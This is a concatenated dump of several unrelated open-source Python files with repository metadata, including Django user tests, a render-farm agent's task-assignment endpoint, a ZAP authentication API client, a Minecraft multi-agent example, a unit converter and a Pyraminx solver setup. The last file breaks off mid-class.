abcd4a48420badb64f86a53b7b28f0e7b524fd7f | 1,409 | py | Python | bumblebee/users/tests.py | sthasam2/bumblebee-backend | 22057399f34cdc1edb0ef04e622c97df46532de3 | [
"Linux-OpenIB"
] | null | null | null | bumblebee/users/tests.py | sthasam2/bumblebee-backend | 22057399f34cdc1edb0ef04e622c97df46532de3 | [
"Linux-OpenIB"
] | null | null | null | bumblebee/users/tests.py | sthasam2/bumblebee-backend | 22057399f34cdc1edb0ef04e622c97df46532de3 | [
"Linux-OpenIB"
] | null | null | null | import random
import string
from django.test import TestCase
from bumblebee.users.models import CustomUser
class UserProfileTest(TestCase):
def random_string(self):
return "".join(random.choice(string.ascii_lowercase) for i in range(10))
def test_user_has_profile(self):
user = CustomUser(
email=f"{self.random_string()}@{self.random_string()}.com",
username=self.random_string(),
password="123ajkdsa34fana",
)
user.save()
self.assertTrue(hasattr(user, "profile"))
class UpdateUserTest(TestCase):
def random_string(self):
return "".join(random.choice(string.ascii_lowercase) for i in range(10))
def test_user_update(self):
user = CustomUser(
email=f"{self.random_string()}@{self.random_string()}.com",
username=self.random_string(),
password="123ajkdsa34fana",
)
user.save()
saved = CustomUser.objects.update_user(
user.id,
username="sambeg",
password="new_password",
email="sthas@dasd.com",
active=False,
)
self.assertTrue(getattr(saved, "username") == "sambeg")
self.assertTrue(saved.check_password("new_password"))
self.assertTrue(getattr(saved, "email") == "sthas@dasd.com")
self.assertTrue(getattr(saved, "active") == False)
| 29.354167 | 80 | 0.620298 |
abce73ab5ea7484cda032b4a04d06bfbe7876a23 | 16,481 | py | Python | pyfarm/agent/http/api/assign.py | guidow/pyfarm-agent | bb5d464f9f6549a3db3529a93e3d9f388b365586 | [
"Apache-2.0"
] | null | null | null | pyfarm/agent/http/api/assign.py | guidow/pyfarm-agent | bb5d464f9f6549a3db3529a93e3d9f388b365586 | [
"Apache-2.0"
] | null | null | null | pyfarm/agent/http/api/assign.py | guidow/pyfarm-agent | bb5d464f9f6549a3db3529a93e3d9f388b365586 | [
"Apache-2.0"
] | null | null | null | # No shebang line, this module is meant to be imported
#
# Copyright 2014 Oliver Palmer
# Copyright 2014 Ambient Entertainment GmbH & Co. KG
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from uuid import uuid4
try:
from httplib import (
ACCEPTED, BAD_REQUEST, CONFLICT, SERVICE_UNAVAILABLE, OK)
except ImportError: # pragma: no cover
from http.client import (
ACCEPTED, BAD_REQUEST, CONFLICT, SERVICE_UNAVAILABLE, OK)
import traceback
from functools import partial
from twisted.internet import reactor
from twisted.internet.defer import DeferredList
from voluptuous import Schema, Required
from pyfarm.core.enums import WorkState, AgentState
from pyfarm.agent.config import config
from pyfarm.agent.http.core.client import post, http_retry_delay
from pyfarm.agent.http.api.base import APIResource
from pyfarm.agent.logger import getLogger
from pyfarm.agent.utility import request_from_master
from pyfarm.agent.sysinfo.memory import free_ram
from pyfarm.agent.utility import JOBTYPE_SCHEMA, TASKS_SCHEMA, JOB_SCHEMA
from pyfarm.jobtypes.core.internals import InsufficientSpaceError
from pyfarm.jobtypes.core.jobtype import JobType
from pyfarm.agent.utility import dumps
# Module-level logger for the assignment endpoint.
logger = getLogger("agent.http.assign")
class Assign(APIResource):
    """
    HTTP API resource through which the master pushes batches of tasks
    (assignments) to this agent.  Only POST is implemented here.
    """
    isLeaf = False  # this is not really a collection of things

    # Schemas used for validating the request before
    # the target function will handle it.  These make
    # assertions about what kind of input data is required
    # or not based on the agent's internal code.
    SCHEMAS = {
        "POST": Schema({
            Required("job"): JOB_SCHEMA,
            Required("jobtype"): JOBTYPE_SCHEMA,
            Required("tasks"): TASKS_SCHEMA})}

    def __init__(self, agent):
        # The running agent instance; used for state checks and
        # reannouncing to the master.
        self.agent = agent

    def post(self, **kwargs):
        """
        Accept (or reject) a work assignment pushed by the master.

        The request is rejected (with BAD_REQUEST, CONFLICT or
        SERVICE_UNAVAILABLE) when the agent id does not match, the agent
        is reannouncing, shutting down or restarting, resources (RAM or
        CPUs) are insufficient, or the tasks overlap an existing
        assignment.  On acceptance the job type is loaded asynchronously
        and ``(dumps({"id": <uuid>}), ACCEPTED)`` is returned
        immediately.
        """
        if request_from_master(kwargs["request"]):
            config.master_contacted()
        request = kwargs["request"]
        request_data = kwargs["data"]

        # First, get the resources we have *right now*.  In some cases
        # this means using the functions in pyfarm.core.sysinfo because
        # entries in `config` could be slightly out of sync with the system.
        memory_free = free_ram()
        cpus = config["agent_cpus"]
        requires_ram = request_data["job"].get("ram")
        requires_cpus = request_data["job"].get("cpus")

        if ("agent_id" in request_data and
                request_data["agent_id"] != config["agent_id"]):
            logger.error("Wrong agent_id in assignment: %s. Our id is %s",
                         request_data["agent_id"], config["agent_id"])
            return (
                dumps({"error": "You have the wrong agent. "
                                "I am %s." % config["agent_id"],
                       "agent_id": config["agent_id"]}),
                BAD_REQUEST
            )

        elif self.agent.reannounce_lock.locked:
            logger.warning("Temporarily rejecting assignment because we "
                           "are in the middle of a reannounce.")
            return (
                dumps({"error": "Agent cannot accept assignments because of a "
                                "reannounce in progress. Try again shortly."}),
                SERVICE_UNAVAILABLE
            )

        elif self.agent.shutting_down:
            logger.error("Rejecting assignment because the agent is in the "
                         "process of shutting down.")
            return (
                dumps({"error": "Agent cannot accept assignments because it is "
                                "shutting down."}),
                SERVICE_UNAVAILABLE
            )

        elif "restart_requested" in config \
                and config["restart_requested"] is True:
            logger.error("Rejecting assignment because of scheduled restart.")
            return (
                dumps({"error": "Agent cannot accept assignments because of a "
                                "pending restart."}),
                SERVICE_UNAVAILABLE
            )

        elif "agent_id" not in config:
            logger.error(
                "Agent has not yet connected to the master or `agent_id` "
                "has not been set yet.")
            return (
                dumps({"error": "agent_id has not been set in the config"}),
                SERVICE_UNAVAILABLE
            )

        # Do we have enough ram?
        elif requires_ram is not None and requires_ram > memory_free:
            logger.error(
                "Task %s requires %sMB of ram, this agent has %sMB free. "
                "Rejecting Task %s.",
                request_data["job"]["id"], requires_ram, memory_free,
                request_data["job"]["id"])
            config["free_ram"] = memory_free
            return (
                dumps({"error": "Not enough ram",
                       "agent_ram": memory_free,
                       "requires_ram": requires_ram}),
                BAD_REQUEST
            )

        # Do we have enough cpus (count wise)?
        elif requires_cpus is not None and requires_cpus > cpus:
            logger.error(
                "Task %s requires %s CPUs, this agent has %s CPUs. "
                "Rejecting Task %s.",
                request_data["job"]["id"], requires_cpus, cpus,
                request_data["job"]["id"])
            return (
                dumps({"error": "Not enough cpus",
                       "agent_cpus": cpus,
                       "requires_cpus": requires_cpus}),
                BAD_REQUEST
            )

        new_task_ids = set(task["id"] for task in request_data["tasks"])

        # Compare the incoming batch against every assignment we already
        # hold: identical batches are acknowledged again, partial
        # overlaps are rejected.
        for assignment in config["current_assignments"].itervalues():
            existing_task_ids = set(x["id"] for x in assignment["tasks"])

            # If the assignment is identical to one we already have
            if existing_task_ids == new_task_ids:
                logger.debug(
                    "Ignoring repeated assignment of the same batch")
                return dumps({"id": assignment["id"]}), ACCEPTED

            # If there is only a partial overlap
            elif existing_task_ids & new_task_ids:
                logger.error("Rejecting assignment with partial overlap with "
                             "existing assignment.")
                unknown_task_ids = new_task_ids - existing_task_ids
                return (
                    dumps({"error": "Partial overlap of tasks",
                           "rejected_task_ids": list(unknown_task_ids)}),
                    CONFLICT
                )

        # When sharing is disabled, reject the batch if any running job
        # type still has unfinished tasks.
        if not config["agent_allow_sharing"]:
            for jobtype in config["jobtypes"].itervalues():
                num_finished_tasks = (len(jobtype.finished_tasks) +
                                      len(jobtype.failed_tasks))
                if len(jobtype.assignment["tasks"]) > num_finished_tasks:
                    logger.error("Rejecting an assignment that would require "
                                 "agent sharing")
                    return (
                        dumps({
                            "error": "Agent does not allow multiple "
                                     "assignments",
                            "rejected_task_ids": list(new_task_ids)}),
                        CONFLICT
                    )

        # Accept the batch: register it under a fresh uuid before the
        # asynchronous job type load begins.
        assignment_uuid = uuid4()
        request_data.update(id=assignment_uuid)
        config["current_assignments"][assignment_uuid] = request_data
        logger.debug("Accepted assignment %s: %r",
                     assignment_uuid, request_data)
        logger.info("Accept assignment from job %s with %s tasks",
                    request_data["job"]["title"], len(request_data["tasks"]))

        def assignment_failed(result, assign_id):
            """Errback: drop the assignment and stop its job type."""
            logger.error(
                "Assignment %s failed, result: %r, removing.", assign_id, result)
            logger.error(result.getTraceback())
            if (len(config["current_assignments"]) <= 1 and
                    not self.agent.shutting_down):
                config["state"] = AgentState.ONLINE
                self.agent.reannounce(force=True)
            # Do not mark the assignment as failed if the reason for failing
            # was that we ran out of disk space
            failed = not isinstance(result.value, InsufficientSpaceError)
            assignment = config["current_assignments"].pop(assign_id)
            if "jobtype" in assignment:
                jobtype_id = assignment["jobtype"].pop("id", None)
                if jobtype_id:
                    instance = config["jobtypes"].pop(jobtype_id, None)
                    instance.stop(
                        assignment_failed=failed,
                        avoid_reassignment=not failed,
                        error="Error in jobtype: %r. "
                              "Traceback: %s" % (result,
                                                 traceback.format_exc()))

        def assignment_started(_, assign_id):
            """Callback: mark the agent as running once work begins."""
            logger.debug("Assignment %s has started", assign_id)
            config["state"] = AgentState.RUNNING
            self.agent.reannounce(force=True)

        def remove_assignment(_, assign_id):
            # Drop the assignment and its job type instance (if any)
            # from the agent's bookkeeping.
            assignment = config["current_assignments"].pop(assign_id)
            if "jobtype" in assignment:
                jobtype_id = assignment["jobtype"].pop("id", None)
                if jobtype_id:
                    config["jobtypes"].pop(jobtype_id, None)

        def assignment_stopped(_, assign_id):
            """Callback: clean up after the job type finishes."""
            logger.debug("Assignment %s has stopped", assign_id)
            if (len(config["current_assignments"]) <= 1 and
                    not self.agent.shutting_down):
                config["state"] = AgentState.ONLINE
                self.agent.reannounce(force=True)
            assignment = config["current_assignments"][assign_id]
            if "jobtype" in assignment:
                jobtype_id = assignment["jobtype"].pop("id", None)
                if jobtype_id:
                    jobtype = config["jobtypes"].pop(jobtype_id, None)
                    # Wait for any in-flight task updates to settle
                    # before removing the assignment itself.
                    updates_deferred = DeferredList(
                        jobtype.task_update_deferreds)
                    updates_deferred.addBoth(remove_assignment, assign_id)
            else:
                config["current_assignments"].pop(assign_id)

        def restart_if_necessary(_):  # pragma: no cover
            # Honour a restart that was requested while we were busy.
            if "restart_requested" in config and config["restart_requested"]:
                stopping = config["agent"].stop()
                stopping.addCallbacks(lambda _: reactor.stop(),
                                      lambda _: reactor.stop())

        def load_jobtype_failed(result, assign_id):
            """Errback: the job type could not be loaded.

            Removes the assignment and marks every task in it as FAILED
            on the master, retrying the updates on server errors.
            """
            logger.error(
                "Loading jobtype for assignment %s failed, removing.", assign_id)
            # NOTE: this local shadows the module-level ``traceback``
            # import within this function.
            traceback = result.getTraceback()
            logger.debug("Got traceback")
            logger.error(traceback)
            assignment = config["current_assignments"].pop(assign_id)

            # Mark all tasks as failed on master and set an error message
            logger.debug("Marking tasks in assignment as failed")

            def post_update(post_url, post_data, task, delay=0):
                # Schedule the POST on the reactor so retries can be
                # delayed without blocking.
                post_func = partial(post, post_url, data=post_data,
                                    callback=lambda x: result_callback(
                                        post_url, post_data, task, x),
                                    errback=lambda x: error_callback(
                                        post_url, post_data, task, x))
                reactor.callLater(delay, post_func)

            def result_callback(cburl, cbdata, task, response):
                # Retry on 5xx, log other non-OK responses, otherwise done.
                if 500 <= response.code < 600:
                    logger.error(
                        "Error while marking task %s as failed on master, "
                        "retrying", task["id"])
                    post_update(cburl, cbdata, task, delay=http_retry_delay())
                elif response.code != OK:
                    logger.error(
                        "Could not mark task %s as failed, server response "
                        "code was %s", task["id"], response.code)
                else:
                    logger.info(
                        "Marked task %s as failed on master", task["id"])

            def error_callback(cburl, cbdata, task, failure_reason):
                # Network-level failure: retry after a delay.
                logger.error(
                    "Error while marking task %s as failed, retrying",
                    task["id"], failure_reason)
                post_update(cburl, cbdata, task, delay=http_retry_delay())

            for task in assignment["tasks"]:
                url = "%s/jobs/%s/tasks/%s" % (
                    config["master_api"], assignment["job"]["id"], task["id"])
                data = {
                    "state": WorkState.FAILED,
                    "last_error": traceback}
                post_update(url, data, task)

            # If the loading was partially successful for some reason, there
            # might already be an entry for this jobtype in the config.
            # Remove it if it exists.
            if "jobtype" in assignment:
                jobtype_id = assignment["jobtype"].pop("id", None)
                if jobtype_id:
                    config["jobtypes"].pop(jobtype_id, None)

        def loaded_jobtype(jobtype_class, assign_id):
            """Callback: instantiate and start the loaded job type."""
            # TODO: report error to master
            if hasattr(jobtype_class, "getTraceback"):
                logger.error(jobtype_class.getTraceback())
                return

            # TODO: add call to prepare_for_job
            # TODO: add call to spawn_persistent_process

            # Instance the job type and pass in the assignment data.
            instance = jobtype_class(request_data)

            if not isinstance(instance, JobType):
                raise TypeError(
                    "Expected a subclass of "
                    "pyfarm.jobtypes.core.jobtype.JobType")

            # TODO: add callback to cleanup_after_job
            # TODO: add callback to stop persistent process
            try:
                started_deferred, stopped_deferred = instance._start()
                started_deferred.addCallback(assignment_started, assign_id)
                started_deferred.addErrback(assignment_failed, assign_id)
                stopped_deferred.addCallback(assignment_stopped, assign_id)
                stopped_deferred.addErrback(assignment_failed, assign_id)
                stopped_deferred.addBoth(restart_if_necessary)
                stopped_deferred.addBoth(
                    lambda *args: instance._remove_tempdirs())
                stopped_deferred.addBoth(
                    lambda *args: instance._close_logs())
                stopped_deferred.addBoth(
                    lambda *args: instance._upload_logfile())
            except Exception as e:
                logger.error("Error on starting jobtype, stopping it now. "
                             "Error was: %r. Traceback: %s", e,
                             traceback.format_exc())
                instance.stop(assignment_failed=True,
                              error="Error while loading jobtype: %r. "
                                    "Traceback: %s" %
                                    (e, traceback.format_exc()))
                assignment = config["current_assignments"].pop(assign_id)
                if "jobtype" in assignment:
                    jobtype_id = assignment["jobtype"].pop("id", None)
                    if jobtype_id:
                        config["jobtypes"].pop(jobtype_id, None)

        # Load the job type, then hand the class to loaded_jobtype.
        # Loading failures are routed to load_jobtype_failed via the
        # errback below.
        jobtype_loader = JobType.load(request_data)
        jobtype_loader.addCallback(loaded_jobtype, assignment_uuid)
        jobtype_loader.addErrback(load_jobtype_failed, assignment_uuid)

        return dumps({"id": assignment_uuid}), ACCEPTED
| 44.663957 | 81 | 0.564225 |
abcf74d3543dcbf2c7fa1eff397453f8e4095e08 | 3,044 | py | Python | python/api/src/zapv2/auth.py | psiinon/zaproxy-release | 5462b14fb337a2d4f68595a207aa3367ec71a671 | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2017-07-26T18:03:44.000Z | 2017-07-26T18:03:44.000Z | python/api/src/zapv2/auth.py | gcxtx/zappy | 3d215327addd6f2ea4ca7091a42c330c67fc30ef | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 2 | 2016-02-25T10:06:53.000Z | 2016-03-29T07:49:34.000Z | python/api/src/zapv2/auth.py | gcxtx/zappy | 3d215327addd6f2ea4ca7091a42c330c67fc30ef | [
"ECL-2.0",
"Apache-2.0",
"BSD-3-Clause"
] | 1 | 2021-08-17T05:48:59.000Z | 2021-08-17T05:48:59.000Z | # Zed Attack Proxy (ZAP) and its related class files.
#
# ZAP is an HTTP/HTTPS proxy for assessing web application security.
#
# Copyright 2013 ZAP development team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This file was automatically generated.
"""
class auth(object):
    """Client bindings for ZAP's authentication API (views and actions)."""

    def __init__(self, zap):
        self.zap = zap

    def _ctx_view(self, endpoint, contextid):
        # Every "view" endpoint takes a single contextId parameter.
        return self.zap._request(
            self.zap.base + 'auth/view/' + endpoint + '/',
            {'contextId': contextid})

    def _ctx_action(self, endpoint, contextid):
        # Every simple "action" endpoint takes a single contextId parameter.
        return self.zap._request(
            self.zap.base + 'auth/action/' + endpoint + '/',
            {'contextId': contextid})

    def login_url(self, contextid):
        """Return the login URL configured for the given context."""
        return self._ctx_view('loginUrl', contextid)

    def login_data(self, contextid):
        """Return the login POST data configured for the given context."""
        return self._ctx_view('loginData', contextid)

    def logged_in_indicator(self, contextid):
        """Return the logged-in indicator for the given context."""
        return self._ctx_view('loggedInIndicator', contextid)

    def logout_url(self, contextid):
        """Return the logout URL configured for the given context."""
        return self._ctx_view('logoutUrl', contextid)

    def logout_data(self, contextid):
        """Return the logout POST data configured for the given context."""
        return self._ctx_view('logoutData', contextid)

    def logged_out_indicator(self, contextid):
        """Return the logged-out indicator for the given context."""
        return self._ctx_view('loggedOutIndicator', contextid)

    def login(self, contextid):
        """Perform a login for the given context."""
        return self._ctx_action('login', contextid)

    def logout(self, contextid):
        """Perform a logout for the given context."""
        return self._ctx_action('logout', contextid)

    @property
    def auto_reauth_on(self):
        """Enable automatic re-authentication."""
        response = self.zap._request(self.zap.base + 'auth/action/autoReauthOn/')
        return response.get('autoReauthOn')

    @property
    def auto_reauth_off(self):
        """Disable automatic re-authentication."""
        response = self.zap._request(self.zap.base + 'auth/action/autoReauthOff/')
        return response.get('autoReauthOff')

    def set_login_url(self, contextid, url, postdata=''):
        """Configure the login URL (and optional POST data) for a context."""
        params = {'contextId': contextid, 'url': url, 'postData': postdata}
        return self.zap._request(self.zap.base + 'auth/action/setLoginUrl/', params)

    def set_login_indicator(self, contextid, indicator):
        """Configure the logged-in indicator for a context."""
        params = {'contextId': contextid, 'indicator': indicator}
        return self.zap._request(self.zap.base + 'auth/action/setLoginIndicator/', params)

    def set_logout_url(self, contextid, url, postdata=''):
        """Configure the logout URL (and optional POST data) for a context."""
        params = {'contextId': contextid, 'url': url, 'postData': postdata}
        return self.zap._request(self.zap.base + 'auth/action/setLogoutUrl/', params)

    def set_logged_out_indicator(self, contextid, indicator):
        """Configure the logged-out indicator for a context."""
        params = {'contextId': contextid, 'indicator': indicator}
        return self.zap._request(self.zap.base + 'auth/action/setLoggedOutIndicator/', params)
abcf771bb1eef36b8475fbd6b6801cc8c8d640fe | 1,387 | py | Python | examples/multi_agent.py | spMohanty/marlo | 6ca3dc449fba58413b1797b28bb3e2374d62751f | [
"MIT"
] | 214 | 2018-07-26T13:48:36.000Z | 2022-03-25T11:34:53.000Z | examples/multi_agent.py | spMohanty/marlo | 6ca3dc449fba58413b1797b28bb3e2374d62751f | [
"MIT"
] | 47 | 2018-08-01T16:03:07.000Z | 2022-02-12T12:46:09.000Z | examples/multi_agent.py | spMohanty/marLo | 6ca3dc449fba58413b1797b28bb3e2374d62751f | [
"MIT"
] | 48 | 2018-07-27T15:49:01.000Z | 2021-07-18T13:55:56.000Z | #!/usr/bin/env python
# Please ensure that you have two Minecraft clients running on port 10000 and
# port 10001 by doing :
# $MALMO_MINECRAFT_ROOT/launchClient.sh -port 10000
# $MALMO_MINECRAFT_ROOT/launchClient.sh -port 10001
import marlo

# One Minecraft client must already be listening on each of these ports
# (see the launchClient.sh instructions above).
client_pool = [('127.0.0.1', 10000), ('127.0.0.1', 10001)]
join_tokens = marlo.make('MarLo-MazeRunner-v0',
                         params={
                             "client_pool": client_pool,
                             "agent_names":
                                 [
                                     "MarLo-Agent-0",
                                     "MarLo-Agent-1"
                                 ]
                         })
# As this is a two-agent scenario,
# there will be just two join tokens
assert len(join_tokens) == 2
@marlo.threaded
def run_agent(join_token):
    """
    Join the mission identified by *join_token* and take random actions
    until the episode ends.

    Decorated with ``@marlo.threaded``, so calling it returns
    immediately with a thread handle (see the unpacking at the call
    sites below).
    """
    env = marlo.init(join_token)
    env.reset()
    done = False
    while not done:
        # Sample a random action each step; no learning is involved.
        action = env.action_space.sample()
        obs, reward, done, info = env.step(action)
        print("reward:", reward)
        print("done:", done)
        print("info", info)
    env.close()
# Run agent-0 in its own thread
thread_handler_0, _ = run_agent(join_tokens[0])

# Run agent-1 in its own thread
thread_handler_1, _ = run_agent(join_tokens[1])

# Wait until both threads complete execution
thread_handler_0.join()
thread_handler_1.join()

print("Episode Run complete")
abd0e54c20c46104555050953447f088dffd69a5 | 1,349 | py | Python | hal/libraries/convert.py | virtualanup/hal | c45757ee2d0661b6f1a5141fc67ebe94cf3ab673 | [
"MIT"
] | 3 | 2017-02-14T01:00:39.000Z | 2017-06-11T09:51:20.000Z | hal/libraries/convert.py | virtualanup/hal | c45757ee2d0661b6f1a5141fc67ebe94cf3ab673 | [
"MIT"
] | null | null | null | hal/libraries/convert.py | virtualanup/hal | c45757ee2d0661b6f1a5141fc67ebe94cf3ab673 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import re
import random
from semantic3.units import ConversionService
from hal.library import HalLibrary
class ConvLib(HalLibrary):
    """
    Unit-conversion library.

    Matches inputs such as "convert 7 pounds to kg" and delegates the
    actual conversion to semantic3's ConversionService.
    """
    name = "Converter"
    keywords = ["convert", "converter", "conversion"]
    # Group 2 captures the trailing conversion expression after the verb.
    convregex = re.compile(
        "(convert|change)(.*)", re.IGNORECASE)

    def init(self):
        # No per-instance state needed.
        pass

    def process_input(self):
        """Parse the matched expression and attempt the conversion.

        On success, stores the converted value in ``self.result`` and
        sets ``self.status`` to ``self.SUCCESS``.  Conversion failures
        are deliberately ignored (the library simply does not respond).
        """
        if self.match_and_reduce(self.convregex):
            expression = self.last_matched.groups()[-1].strip()
            if expression:
                try:
                    # Try conversion
                    service = ConversionService()
                    self.result = service.convert(expression)
                    self.status = self.SUCCESS
                except Exception:
                    # Fail silently on conversion errors.  Previously a
                    # bare ``except:`` was used, which also swallowed
                    # SystemExit/KeyboardInterrupt; Exception keeps the
                    # intended best-effort behaviour without that.
                    pass

    def process(self):
        """Emit the stored conversion result as a response."""
        self.add_response("Result : " + str(self.result))

    @classmethod
    def help(cls):
        """Return the help metadata (name, description, samples)."""
        return {
            "name": "Conversion",
            "description": "Conversion between units",
            "samples": [
                "convert a pound to kg",
                "change Seven and a half kilograms to pounds",
                "convert Seven and a half pounds per square foot to kilograms per meter squared",
            ]
        }
| 25.942308 | 101 | 0.530022 |
abd45386c13bbf86460d0c5870b53d4590ef63ba | 933 | py | Python | clients/client/python/test/test_volume.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | [
"Apache-2.0"
] | null | null | null | clients/client/python/test/test_volume.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | [
"Apache-2.0"
] | null | null | null | clients/client/python/test/test_volume.py | simoneromano96/sdk | a6113d0daefbbb803790297e4b242d4c7cbbcb22 | [
"Apache-2.0"
] | null | null | null | """
Ory APIs
Documentation for all public and administrative Ory APIs. Administrative APIs can only be accessed with a valid Personal Access Token. Public APIs are mostly used in browsers. # noqa: E501
The version of the OpenAPI document: v0.0.1-alpha.3
Contact: support@ory.sh
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import ory_client
from ory_client.model.volume_usage_data import VolumeUsageData
globals()['VolumeUsageData'] = VolumeUsageData
from ory_client.model.volume import Volume
class TestVolume(unittest.TestCase):
    """Unit-test skeleton for the Volume model."""

    def setUp(self):
        """No fixtures are required yet."""
        return None

    def tearDown(self):
        """Nothing to clean up."""
        return None

    def testVolume(self):
        """Placeholder test for Volume.

        FIXME: construct a Volume with example values for its mandatory
        attributes once the schema is pinned down, e.g. ``Volume()``.
        """
        return None
if __name__ == '__main__':
unittest.main()
| 23.923077 | 194 | 0.697749 |
abd6eef90ad96992e821c7e62a12d3098278c5bf | 1,191 | py | Python | pyraminxolver/setup.py | Odder/PyraminXolver | f497a3936e63a51bb9de4d445db0a1399ae4b85c | [
"MIT"
] | 1 | 2020-02-16T11:11:35.000Z | 2020-02-16T11:11:35.000Z | pyraminxolver/setup.py | Odder/PyraminXolver | f497a3936e63a51bb9de4d445db0a1399ae4b85c | [
"MIT"
] | 1 | 2019-10-06T07:19:56.000Z | 2019-10-26T20:39:19.000Z | pyraminxolver/setup.py | Odder/PyraminXolver | f497a3936e63a51bb9de4d445db0a1399ae4b85c | [
"MIT"
] | 1 | 2019-11-22T15:53:29.000Z | 2019-11-22T15:53:29.000Z | from collections import deque
import pickle
from . import Pyraminx, PYRAMINX_CASE_PATH
from multiprocessing import Pool, cpu_count
def setup():
    """Build the full Pyraminx move graph and cache it to PYRAMINX_CASE_PATH."""
    with open(PYRAMINX_CASE_PATH, 'wb') as cache_file:
        pickle.dump(create_graph(), cache_file, pickle.HIGHEST_PROTOCOL)
def create_graph():
    """Expand every Pyraminx state in parallel, then label each with its BFS depth."""
    with Pool(cpu_count()) as workers:
        # 933120 is the total number of enumerable Pyraminx states.
        adjacency = workers.map(explore_node, list(range(933120)))
    return generate_depths(adjacency)
def explore_node(node):
    """Return [depth_placeholder, neighbour_1 .. neighbour_8] for one state id.

    Slot 0 is reserved for the BFS depth (filled in later by
    generate_depths, initialised to -1); slots 1-8 hold the state ids
    reached by applying each of the eight move transformations.
    """
    state = Pyraminx.id_to_state(node)
    neighbours = [
        Pyraminx.state_to_id(Pyraminx.apply_move(state, move))
        for move in Pyraminx.move_transformations[:8]
    ]
    return [-1] + neighbours
def generate_depths(graph):
    """Breadth-first fill of slot 0 of every node with its distance from node 0.

    graph[i] is [depth, neighbour_ids...]; unvisited depths are -1.
    The list is mutated in place and also returned.
    """
    graph[0][0] = 0
    frontier = deque([0])
    while frontier:
        current = frontier.popleft()
        next_depth = graph[current][0] + 1
        for neighbour in graph[current][1:]:
            if graph[neighbour][0] == -1:
                graph[neighbour][0] = next_depth
                frontier.append(neighbour)
    return graph
if __name__ == '__main__':
setup()
| 24.8125 | 63 | 0.618808 |
abd7ebb6a3efed0c59a0bf6d4b58df0c2f293555 | 307 | py | Python | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | null | null | null | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | 7 | 2021-08-23T20:52:07.000Z | 2022-03-12T00:48:51.000Z | Models/utils.py | Pipe-Runner-Lab/cornell_birdcall_identification | 79a807c4a7e368b2ffcb7ecc91176c2bc03f650a | [
"MIT"
] | null | null | null | from torch import nn
def get_default_fc(num_ftrs, adjusted_classes, params):
    """Build the default classifier head: two hidden Linear(1024) layers
    with ReLU + Dropout, followed by the output projection.

    Dropout probabilities are read from params.fc_drop_out_0 and
    params.fc_drop_out_1.
    """
    layers = [
        nn.Linear(num_ftrs, 1024),
        nn.ReLU(),
        nn.Dropout(p=params.fc_drop_out_0),
        nn.Linear(1024, 1024),
        nn.ReLU(),
        nn.Dropout(p=params.fc_drop_out_1),
        nn.Linear(1024, adjusted_classes),
    ]
    return nn.Sequential(*layers)
abd8b52c7e5526a7a50e3b7112ad423f0a22076f | 4,452 | py | Python | dgp/features/feature_ontology.py | chrisochoatri/dgp | 7eb437072b656804a8716186cc61f6ba148e3a46 | [
"MIT"
] | null | null | null | dgp/features/feature_ontology.py | chrisochoatri/dgp | 7eb437072b656804a8716186cc61f6ba148e3a46 | [
"MIT"
] | null | null | null | dgp/features/feature_ontology.py | chrisochoatri/dgp | 7eb437072b656804a8716186cc61f6ba148e3a46 | [
"MIT"
] | null | null | null | # Copyright 2021-2022 Toyota Research Institute. All rights reserved.
import os
from collections import OrderedDict
from dgp.proto.ontology_pb2 import FeatureOntology as FeatureOntologyPb2
from dgp.proto.ontology_pb2 import FeatureOntologyItem
from dgp.utils.protobuf import (generate_uid_from_pbobject, open_feature_ontology_pbobject, save_pbobject_as_json)
class FeatureOntology:
    """Feature ontology object. At bare minimum, we expect ontologies to provide:
    ID: (int) identifier for feature field name
    Name: (str) string identifier for feature field name
    Based on the task, additional fields may be populated. Refer to `dataset.proto` and `ontology.proto`
    specifications for more details. Can be constructed from file or from deserialized proto object.
    Parameters
    ----------
    feature_ontology_pb2: OntologyPb2
        Deserialized ontology object.
    """
    # Special value and class name reserved for pixels that should be ignored
    VOID_ID = 255
    VOID_CLASS = "Void"
    def __init__(self, feature_ontology_pb2):
        self._ontology = feature_ontology_pb2
        if isinstance(self._ontology, FeatureOntologyPb2):
            # Build deterministic (sorted) lookup tables from the proto items:
            # name -> id, id -> name and id -> feature value type.
            self._name_to_id = OrderedDict(
                sorted([(ontology_item.name, ontology_item.id) for ontology_item in self._ontology.items])
            )
            self._id_to_name = OrderedDict(
                sorted([(ontology_item.id, ontology_item.name) for ontology_item in self._ontology.items])
            )
            self._id_to_feature_value_type = OrderedDict(
                sorted([(ontology_item.id, ontology_item.feature_value_type) for ontology_item in self._ontology.items])
            )
        else:
            raise TypeError("Unexpected type {}, expected FeatureOntologyV2".format(type(self._ontology)))
        # Cache sorted ids and their matching names for the list accessors below.
        self._feature_ids = sorted(self._id_to_name.keys())
        self._feature_names = [self._id_to_name[c_id] for c_id in self._feature_ids]
    @classmethod
    def load(cls, ontology_file):
        """Construct an ontology from an ontology JSON.
        Parameters
        ----------
        ontology_file: str
            Path to ontology JSON
        Raises
        ------
        FileNotFoundError
            If ontology_file does not exist.
        TypeError
            If the file exists but cannot be parsed into an ontology proto.
        """
        if os.path.exists(ontology_file):
            feature_ontology_pb2 = open_feature_ontology_pbobject(ontology_file)
        else:
            raise FileNotFoundError("Could not find {}".format(ontology_file))
